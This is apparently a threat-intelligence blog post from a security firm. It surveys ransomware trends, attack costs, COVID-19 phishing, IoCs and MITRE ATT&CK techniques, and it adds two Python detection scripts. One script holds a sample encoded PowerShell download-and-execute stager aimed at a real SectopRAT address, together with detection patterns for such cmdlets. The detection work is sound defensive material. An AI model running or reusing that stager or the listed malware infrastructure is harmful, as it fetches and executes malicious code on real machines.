Why you should be worried about a cyber pandemic that could take over the cyberspace

 

Companies of all sizes and in all sectors fall prey to data breaches and ransomware. A security incident that results in data leakage stains the reputation of the affected organization, quite apart from the legal battle that follows. Enterprises spend millions on security products to build a comprehensive security posture, yet attackers still compromise networks and exfiltrate data. Criminal and state-sponsored threat actors alike craft attack chains designed to evade detection and develop zero-day exploits for the applications their victims use.

Quite often, ransomware developers advertise Ransomware-as-a-Service (RaaS) offerings on underground hacker forums. Today, anyone can rent a RaaS platform and become a ransomware operator. Companies pay the ransom when it appears to be the only viable option, and every payment emboldens threat actors to run more campaigns against organizations.

State-sponsored APTs are more dangerous because they are backed by nation states: their funding rarely runs dry, which lets them build and maintain complex infrastructure. Their objectives also set them apart, since geopolitics rather than financial gain is their primary motivation.


Threat Landscape

Recent trends in the threat landscape centre on ransomware and banking trojans. Multistage malware downloaders are also common in the wild; they act as the delivery stage for ransomware and for other spyware and trojans. Certain ransomware groups also loot cryptocurrency by compromising crypto exchanges.

 

Ransomware

Ryuk

Ryuk has been spotted in attacks targeting enterprise organizations worldwide, demanding ransom payments of 15 to 50 Bitcoin (BTC), which translated to between US$97,000 and $320,000 at the time of valuation.

 

Fig1. Popular attack vectors

 


REvil/ Sodinokibi

REvil/ Sodinokibi ransomware was first detected in 2019, targeting the health and IT sectors. Later, the group began auctioning off sensitive data stolen from its victims over the dark web. As part of its extortion tactics, it threatens to publish victims’ data unless the ransom is paid.

 

Dharma/ CrySiS

Dharma, a variant of CrySiS, appends various extensions to the files it encrypts. The malware has been in operation since 2016, and the threat actors behind it continue to release new variants for which no decryptor is available.

 

STOP/ djvu

Djvu is a high-risk ransomware strain belonging to the STOP malware family. First identified by Michael Gillespie, it encrypts the victim’s files and demands payment for the decryption key.

 


Fig2. Ransomware strains Q1 2020 (incl. STOP)

Cooperation between ransomware families has also increased lately, making Ransomware-as-a-Service (RaaS) operations more efficient.

Fig3. Ransomware strains Q1 2020 (excl. STOP)

STOP, Dharma, Phobos and REvil have played major roles in the RaaS sector. They remain very active today, Dharma and REvil in particular.


Malware attacks vs. Malware-free attacks

Malware-based attacks are the simpler case: a malicious file is written to disk, so file-based controls (antivirus and Endpoint Detection and Response, EDR) have an artifact to hash, scan and block. Malware-free attacks avoid that artifact: code is executed in memory, built-in tools such as PowerShell or WMI are abused, and stolen or sprayed credentials are used for access, so detection has to rely on process behaviour, command lines and authentication telemetry rather than on files. Malware-free techniques have grown as a share of campaigns since 2019, and they routinely evade defenses that were tuned for file-based malware.

 

Cost of a Ransomware Attack

The total cost of a ransomware attack includes the ransom (if paid), network remediation, lost revenue and potential damage to the brand’s reputation. Recent attacks show that more businesses are not only encrypted but also threatened with the release of stolen data unless they pay.

Ransomware groups appear to have weighed the long-term impact on brand image, trust and reputation for organizations that refuse to pay, and priced their demands accordingly. Ryuk is largely responsible for the massive surge in ransom demands: operators now demand an average of $288,000 for the release of systems.


Fig4. Largest amount of ransom reported in 2019

 

Fig5. Largest avg. ransom pay-offs 2020

 

Ransomware statistics for 2020

Taking into account the current trend and statistics, ransomware + downtime costs for the top five countries for 2020 are estimated to be:

  • Italy: $1.1 billion – $4.3 billion
  • Germany: $1 billion – $4 billion
  • Spain: $830 million – $3.3 billion
  • UK: $469 million – $1.9 billion
  • France: $121 million – $485 million

 

Hidden Costs of ransomware

  • Downtime of information systems
  • Loss of reputation
  • Regulatory penalties and fines (compliance)
  • Legal action from affected users


 

Cyber security during COVID-19

“WHO reports fivefold increase in cyber attacks, urges vigilance”

Threat actors have exploited COVID-19 extensively for phishing, masquerading as the WHO and similar agencies to deliver malware-laced emails. COVID-19-themed phishing rose by 667% and scams by 400% over March 2020, making the pandemic the largest single phishing lure seen to date. To make things worse, social distancing guidelines forced organizations to move to remote work at short notice, exposing user endpoints outside the corporate perimeter. The impacts:

  • Increased security risk from remote working and remote learning
  • Potential delay in cyber-attack detection and response, with both analysts and users off the corporate network
  • Business Continuity Plans (BCP) that had not accounted for a global pandemic

 

Effective Threat Intelligence

Take a company earning $10K per hour, operating 8 hours a day, 5 days a week: it generates roughly $1,760,000 a month (about 176 operating hours), so every hour of unplanned downtime costs around $10K in revenue before remediation costs are counted. Typical outage estimates run to 1-2 hours per incident. For a Fortune 500 company, 1.6 hours of average downtime per week is estimated to cost approximately $46M per year.

A Distributed Denial of Service (DDoS) attack temporarily disrupts a website’s operation and can last for days or longer. According to the IDG DDoS report, 36% of companies that have experienced more than five DDoS attacks suffer an average downtime of 7-12 hours.

An experienced Cyber Threat Intelligence (CTI) team gathers information from many sources and converts it into intelligence that protects the organization. Without effective CTI in its security model, a company can fall prey to any attack at any time.

A CTI team can actively monitor and create actionable intelligence on the following areas of your business:

  • Supply chain 
  • Dark web monitoring for data leaks 
  • Zero-days
  • New emerging attack vectors

Threat intelligence must be actionable. It supplies the security team, and especially the Security Operations Center (SOC), with adversary Tactics, Techniques and Procedures (TTPs) and Indicators of Compromise (IoCs) for proactive and reactive measures against cyber threats.

 

Indicators of Compromise

These are some of the common Indicators of Compromise:

  • IP addresses, URLs and domain names used by malware
  • Email addresses, subject lines, links and attachments used in malicious email
  • Registry keys, file names, file hashes and DLLs dropped by malware

Examples (URLs are shown defanged with hxxp so they cannot be clicked or auto-resolved; the email addresses are redacted):
  • hxxp://45.142.213.230/bssd [SectopRAT Trojan]
  • hxxp://45.142.213.230/blad [SectopRAT Trojan]
  • [email protected] [djvu ransomware]
  • [email protected] [djvu ransomware]
  • ef95c48e750c1a3b1af8f5446fa04f54 [Maze, MD5]
  • f04d404d84be66e64a584d425844b926 [Maze, MD5]
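As an added example, not code from the article or from CloudSEK, here is a small IoC matcher of the kind a SOC runs against proxy, EDR and firewall telemetry. The IoC feed uses the SectopRAT URLs and Maze MD5 hashes listed above (the redacted email addresses are left out); the log lines and their field layout are constructed for the demo and are an assumption, not a real product format. The matcher refangs the feed, indexes URLs, bare hosts and hashes separately, and reports a weaker "host match" when a known C2 host is seen serving a path not yet in the feed.

```python
"""Match defanged IoCs from a CTI feed against constructed log lines.

Added example for the IoC section; not the article's code. The IoC values
are the ones quoted on the page, the log lines and field names are made up.
"""
import re
from urllib.parse import urlparse

# IoCs as a feed usually ships them: defanged (hxxp) so they are not clickable.
IOC_FEED = {
    "hxxp://45.142.213.230/bssd": "SectopRAT download URL",
    "hxxp://45.142.213.230/blad": "SectopRAT download URL",
    "ef95c48e750c1a3b1af8f5446fa04f54": "Maze ransomware sample (MD5)",
    "f04d404d84be66e64a584d425844b926": "Maze ransomware sample (MD5)",
}

URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.I)
HASH_RE = re.compile(r"\b[0-9a-f]{32}\b|\b[0-9a-f]{40}\b|\b[0-9a-f]{64}\b", re.I)
IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def refang(value: str) -> str:
    """Undo the common defanging conventions: hxxp(s), [.], (.), [:], (dot)."""
    value = re.sub(r"^hxxps?", lambda m: m.group(0).replace("xx", "tt"), value, flags=re.I)
    for defanged, real in (("[.]", "."), ("(.)", "."), ("(dot)", "."), ("[:]", ":")):
        value = value.replace(defanged, real)
    return value


def build_index(feed):
    """Split the feed into exact-URL, host and hash lookup tables (all lower-case)."""
    urls, hosts, hashes = {}, {}, {}
    for raw, label in feed.items():
        value = refang(raw).lower()
        if re.fullmatch(r"[0-9a-f]{32}|[0-9a-f]{40}|[0-9a-f]{64}", value):
            hashes[value] = label
        elif "://" in value:
            urls[value] = label
            # Index the host too: a proxy may log host and path separately, and
            # one C2 host commonly serves several payload paths over time.
            hosts[urlparse(value).hostname] = label
        else:
            hosts[value] = label
    return urls, hosts, hashes


def scan(lines, feed=IOC_FEED):
    """Return one hit dict per matched indicator, in line order."""
    urls, hosts, hashes = build_index(feed)
    hits = []
    for number, line in enumerate(lines, 1):
        low = line.lower()          # pragmatic: match case-insensitively
        matched = {}                # indicator -> label for this line
        for url in URL_RE.findall(low):
            if url in urls:
                matched[url] = urls[url]
            else:
                host = urlparse(url).hostname
                if host in hosts:
                    matched[host] = hosts[host] + " (host match, path not in feed)"
        for ip in IP_RE.findall(low):
            # Bare IP in a firewall/DNS log; skip if a URL on this line already covered it.
            if ip in hosts and not any(ip in seen for seen in matched):
                matched[ip] = hosts[ip]
        for digest in HASH_RE.findall(low):
            if digest in hashes:
                matched[digest] = hashes[digest]
        hits.extend({"line": number, "indicator": k, "label": v} for k, v in matched.items())
    return hits


# Constructed sample telemetry (not real logs): proxy, EDR, firewall, and one benign line.
SAMPLE_LOGS = [
    "2020-04-02T10:12:03Z proxy src=10.0.0.5 method=GET url=http://45.142.213.230/bssd status=200",
    "2020-04-02T10:14:41Z proxy src=10.0.0.7 method=GET url=http://45.142.213.230/update.bin status=200",
    "2020-04-02T10:12:09Z edr host=WS-17 event=file_write path=C:\\Users\\a\\AppData\\Local\\Temp\\x.exe md5=EF95C48E750C1A3B1AF8F5446FA04F54",
    "2020-04-02T10:15:00Z fw action=allow src=10.0.0.7 dst=45.142.213.230 dport=80",
    "2020-04-02T10:16:00Z proxy src=10.0.0.9 method=GET url=https://www.example.com/ status=200",
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOGS):
        print(f"line {hit['line']}: {hit['indicator']}  ->  {hit['label']}")
```

The second log line is the case worth noticing: the path is new, so an exact-URL rule misses it, but the host is already known as SectopRAT infrastructure. Indexing hosts separately from full URLs is what turns a stale feed entry into a useful lead.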

 

Tactics, Techniques, Procedures/ TTPs

TTPs describe the behaviour of a threat actor or group: how the actor gains access to the network and moves laterally within it.

MITRE ATT&CK is the most widely used, openly available knowledge base of adversary tactics and techniques, built from observed intrusions. At the time of writing it listed 11 tactics and 291 techniques; the matrix is revised several times a year, so counts and technique IDs change between versions.

 

Example of Tactic and Technique

 

Tactic            Technique
Initial Access    T1193: Spearphishing Attachment
Execution         T1059: Command-Line Interface
                  T1086: PowerShell
                  T1085: Rundll32
                  T1064: Scripting
                  T1204: User Execution
                  T1028: Windows Remote Management

The IDs above are the ones in use when this was written; later ATT&CK versions regrouped several of them as sub-techniques (for example, PowerShell became T1059.001 and Spearphishing Attachment T1566.001), so cross-reference by technique name rather than by number.
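As an added example that is not the article’s or CloudSEK’s code, the routine below ties the table to the malware-free attacks discussed earlier: it triages constructed process-creation events (the kind Sysmon or Windows 4688 auditing produces) and tags each with the technique IDs listed above. The log layout (ts|host|parent image|image|command line), the host names and the command lines are assumptions made for the demo; the encoded PowerShell payload is constructed and points at the SectopRAT URL quoted in the IoC section. The part a practitioner usually needs is the decoding of -EncodedCommand, which is base64 over UTF-16LE rather than plain base64.

```python
"""Tag constructed process-creation events with ATT&CK technique IDs.

Added example for the TTP table and the malware-free attacks paragraph; not
the article's code. Log format, hosts and command lines are invented.
"""
import base64
import re
from dataclasses import dataclass

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe", "rundll32.exe"}
PS_FLAGS = [r"-nop\b", r"-noni\b", r"-w(?:indowstyle)?\s+hidden", r"-e(?:xecutionpolicy|p)\s+bypass"]
PS_CMDLETS = re.compile(r"downloadstring|downloadfile|invoke-expression|\biex\b|frombase64string")
ENC_RE = re.compile(r"-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.I)


@dataclass
class ProcEvent:
    ts: str
    host: str
    parent: str     # full path of the parent image, lower-cased
    image: str      # full path of the created process, lower-cased
    cmdline: str    # original command line, case preserved


def parse(line: str) -> ProcEvent:
    """Parse the assumed 'ts|host|parent|image|cmdline' layout (cmdline may contain '|')."""
    ts, host, parent, image, cmdline = line.split("|", 4)
    return ProcEvent(ts, host, parent.lower(), image.lower(), cmdline)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1]


def decode_encoded_command(cmdline: str):
    """Return the plaintext of a -EncodedCommand argument, or None if absent/undecodable."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        # PowerShell encodes the script as UTF-16LE before base64, not as ASCII.
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def classify(ev: ProcEvent):
    """Return [(technique_id, reason), ...] for the event; empty list means nothing matched."""
    findings = []
    img, par, low = basename(ev.image), basename(ev.parent), ev.cmdline.lower()

    if par in OFFICE_APPS and img in SHELLS:
        findings.append(("T1193/T1204", f"{par} spawned {img}: document-borne payload run by the user"))
    if par == "wsmprovhost.exe":   # WinRM-delivered commands run as children of wsmprovhost.exe
        findings.append(("T1028", "child of wsmprovhost.exe: command delivered over WinRM"))
    if img == "cmd.exe" and "/c" in low:
        findings.append(("T1059", "cmd.exe /c one-shot command"))
    if img == "powershell.exe":
        flags = [f for f in PS_FLAGS if re.search(f, low)]
        decoded = decode_encoded_command(ev.cmdline)
        if decoded is not None:
            findings.append(("T1086", f"encoded PowerShell ({', '.join(flags) or 'no flags'}) decodes to: {decoded.strip()}"))
        elif flags or PS_CMDLETS.search(low):
            findings.append(("T1086", "suspicious PowerShell flags or download/IEX cmdlets"))
    if img == "rundll32.exe" and re.search(r"javascript:|\\users\\|\\temp\\|\\appdata\\", low):
        findings.append(("T1085", "rundll32 loading script or a DLL from a user-writable path"))
    if img in ("wscript.exe", "cscript.exe") and re.search(r"\.(vbs|vbe|js|jse|wsf)\b", low):
        findings.append(("T1064", f"{img} running a script file"))
    return findings


def triage(lines):
    """Return one dict per event that matched at least one technique."""
    out = []
    for line in lines:
        ev = parse(line)
        findings = classify(ev)
        if findings:
            out.append({"ts": ev.ts, "host": ev.host, "image": basename(ev.image), "findings": findings})
    return out


# Constructed sample events (not real telemetry). The stager below is built at import
# time so the base64 is guaranteed to be the UTF-16LE encoding PowerShell expects.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://45.142.213.230/bssd')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    f"2020-04-02T10:11:58Z|WS-17|C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|powershell.exe -nop -w hidden -enc {ENCODED}",
    "2020-04-02T10:12:30Z|WS-17|C:\\Windows\\System32\\cmd.exe|C:\\Windows\\System32\\rundll32.exe|rundll32.exe C:\\Users\\a\\AppData\\Local\\Temp\\upd.dll,DllRegisterServer",
    "2020-04-02T10:20:05Z|SRV-DB01|C:\\Windows\\System32\\wsmprovhost.exe|C:\\Windows\\System32\\cmd.exe|cmd.exe /c whoami /all",
    "2020-04-02T10:21:00Z|WS-22|C:\\Windows\\explorer.exe|C:\\Windows\\System32\\wscript.exe|wscript.exe //E:vbscript C:\\Users\\b\\Downloads\\invoice.vbs",
    "2020-04-02T10:25:00Z|WS-22|C:\\Windows\\explorer.exe|C:\\Windows\\System32\\notepad.exe|notepad.exe C:\\Users\\b\\notes.txt",
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        for tid, reason in hit["findings"]:
            print(f"{hit['ts']} {hit['host']} {hit['image']}: {tid} - {reason}")
```

None of the four flagged events writes a new executable to disk, which is exactly why a file-hash IoC feed alone would miss them; parent/child relationships and command-line content are the signal. The first event shows the full chain the table describes: a spearphished document (T1193) opened by the user (T1204) launching hidden, encoded PowerShell (T1086) that pulls the SectopRAT stager.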

 

The efficacy of a CTI team to predict the possibility of an occurrence and ensure effective implementation of mitigation measures is essential to the survival of any organisation in their current realm of operations.

 

Conclusion

To further their nefarious intentions, threat actors arm themselves with sophisticated tools and advanced capabilities, and it is quite difficult for law enforcement and security practitioners to keep pace with them. An effective CTI capability helps organizations contain an attack within the network, reduce the associated costs and minimize data loss; investing in it allows security operations centers to anticipate and mitigate attacks proactively. However, a CTI system is only as strong as its weakest link: humans. Human error can cause even the most robust security system to fail. A good security program monitors information systems and applications and conducts regular vulnerability assessments and pentesting; a comprehensive one also prioritizes employee and user training, kept current with cyber hygiene and best practices.

Anandeshwar Unnikrishnan
Threat Intelligence Researcher , CloudSEK
Anandeshwar is a Threat Intelligence Researcher at CloudSEK. He is a strong advocate of offensive cybersecurity. He is fuelled by his passion for cyber threats in a global context. He dedicates much of his time on Try Hack Me/ Hack The Box/ Offensive Security Playground. He believes that “a strong mind starts with a strong body.” When he is not gymming, he finds time to nurture his passion for teaching. He also likes to travel and experience new cultures.
Hitesh is a certified ethical hacker and is a part of CloudSEK’s threat research squad. Before CloudSEK, he worked as a Threat Research Analyst at DSCI, India. Hitesh also likes to travel and explore new cities and places.